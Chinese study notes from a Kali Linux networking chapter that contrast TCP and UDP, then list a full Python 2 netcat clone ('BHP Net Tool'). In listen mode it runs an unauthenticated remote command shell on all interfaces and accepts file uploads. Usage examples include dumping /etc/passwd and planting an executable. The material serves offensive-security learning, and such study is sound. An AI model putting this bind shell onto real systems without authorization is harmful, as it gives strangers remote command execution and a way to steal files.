操作系统:Kali 32位
第二章:网络编程
TCP(传输控制协议):面向连接,通讯时先建立一条连接,提供有序的、可靠的、不重复的数据传输,数据不会被加上边界;每条发送的消息可能会被拆成很多份,每一份都会不多不少地到达目的地,然后按照原来的顺序拼接起来,传给正在等待的应用程序
UDP:无连接,数据是整个发送,具有数据边界,数据到达的顺序、可靠性及不重复性无法保证
创建一个netcat工具:
1)导入模块,定义全局变量,
subprocess:提供强大的进程创建接口,可以提供多种与客户端交互的方法
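#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sun Jul  2 04:24:51 2017

@author: root

Minimal netcat-style TCP tool (Python 2).

Client mode (-t/-p without -l) sends whatever is on stdin to the target and
then alternates between printing the reply and sending one stdin line.

Listen mode (-l) accepts TCP connections and, depending on the options,
writes the received bytes to a file (-u), runs one command (-e) and/or
serves a command loop (-c).

Security properties visible in this code:
  * the listener neither authenticates the peer nor encrypts the traffic, so
    every host that can reach the port gets whatever -u/-e/-c enable, with
    the privileges of this process;
  * without -t the listener binds 0.0.0.0, i.e. every local interface;
  * received command lines are passed to the shell unmodified.
"""

import sys
import socket
import getopt
import threading
import subprocess

# Module-level settings; main() fills them in from the command line and the
# other functions read them.
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0


def usage():
    """Print the help text and exit with status 0."""
    print "BHP Net Tool"
    print
    print "Usage:bhpnet.py -t target_host -p port"
    print "-l --listen -listen on [host]:[port] for incoming connect"
    print "-e --execute = file_to_run -execute the given file upon receiving a connection"
    print "-c --command -- initialize a commend shell"
    print "-u --upload = destination -upon receiving connecction upload file and write to [destination]"
    print
    print
    print "examples:"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
    print "echo 'ABCDEFG' | ./bhpnet.py -t 192.168.11.12 -p 135"
    sys.exit(0)


def main():
    """Parse the command line into the module globals and start the chosen mode.

    Calls usage() (which exits) when no arguments are given, when getopt
    rejects the command line, or when -h/--help is present.
    """
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    try:
        # Long options that carry a value need the trailing "=", otherwise
        # getopt treats them as flags and the value becomes a stray argument.
        long_options = ["help", "listen", "execute=", "target=",
                        "port=", "command", "upload="]
        opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", long_options)
    except getopt.GetoptError as err:
        print str(err)
        usage()

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--command"):
            command = True
        elif o in ("-u", "--upload"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)
        else:
            assert False, "unhandled option"

    # The mode is chosen here, after the options are parsed; evaluated any
    # earlier, `listen`, `target` and `port` still hold their defaults.
    if not listen and len(target) and port > 0:
        # Client mode: read stdin up to EOF, then send it.
        buffer = sys.stdin.read()
        client_sender(buffer)

    if listen:
        server_loop()


def client_sender(buffer):
    """Connect to (target, port), send *buffer*, then relay replies and stdin lines.

    After the initial send the loop prints what the peer returned and sends
    the next line typed on stdin. A socket error, EOF on stdin or Ctrl-C
    ends the loop; the socket is closed in every case.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        client.connect((target, port))

        if len(buffer):
            # sendall() keeps writing until the whole buffer is out; send()
            # may stop after a partial write.
            client.sendall(buffer)

        while True:
            recv_len = 1
            response = ""

            # A read shorter than 4096 bytes is taken as the end of the reply.
            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response += data

                if recv_len < 4096:
                    break

            print response,

            buffer = raw_input("")
            buffer += "\n"

            client.sendall(buffer)
    except (socket.error, EOFError, KeyboardInterrupt):
        print "[*] Exception exiting."
    finally:
        client.close()


def server_loop():
    """Bind (target, port) and hand every accepted connection to a new thread.

    Runs until the process is stopped. The number of concurrent handler
    threads is not limited.
    """
    global target

    # No -t given: listen on every interface. Passing -t with one local
    # address keeps the listener off the other interfaces.
    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        client_thread = threading.Thread(target=client_handler,
                                         args=(client_socket,))
        client_thread.start()


def run_command(command):
    """Run *command* through the shell and return its combined stdout/stderr.

    Returns a fixed failure string when the command cannot be run or exits
    with a non-zero status.
    """
    command = command.rstrip()

    try:
        # NOTE(review): shell=True hands the string to the shell unmodified.
        # In listen mode with -c the string comes straight from the network
        # peer, so the peer gets a shell with this process's privileges.
        output = subprocess.check_output(command, stderr=subprocess.STDOUT,
                                         shell=True)
    except Exception:
        output = "faile to exectue command \r\n"

    return output


def client_handler(client_socket):
    """Serve one accepted connection according to the module globals.

    In order: store the received bytes in upload_destination (if set), run
    the `execute` command (if set), then serve the command loop (if
    `command` is true). The socket is closed when the handler ends.
    """
    try:
        if len(upload_destination):
            # Read until the peer closes its sending side. The data is held
            # in memory with no size limit before it is written out.
            chunks = []
            while True:
                data = client_socket.recv(1024)
                if not data:
                    break
                chunks.append(data)
            file_buffer = "".join(chunks)

            try:
                # Binary mode, so the bytes are stored exactly as received.
                # NOTE(review): the destination path is used as given and an
                # existing file is overwritten.
                with open(upload_destination, "wb") as file_descriptor:
                    file_descriptor.write(file_buffer)

                client_socket.sendall("successfully saved file %s\r\n" % upload_destination)
            except (IOError, OSError):
                client_socket.sendall("Failed to save file to %s\r\n" % upload_destination)

        if len(execute):
            output = run_command(execute)
            client_socket.sendall(output)

        if command:
            while True:
                client_socket.sendall("<BHP:#>")

                # Collect input until a newline arrives.
                cmd_buffer = ""
                while "\n" not in cmd_buffer:
                    chunk = client_socket.recv(1024)
                    if not chunk:
                        # recv() returns "" once the peer has closed; without
                        # this check the loop would spin forever.
                        return
                    cmd_buffer += chunk

                response = run_command(cmd_buffer)
                client_socket.sendall(response)
    finally:
        client_socket.close()


main()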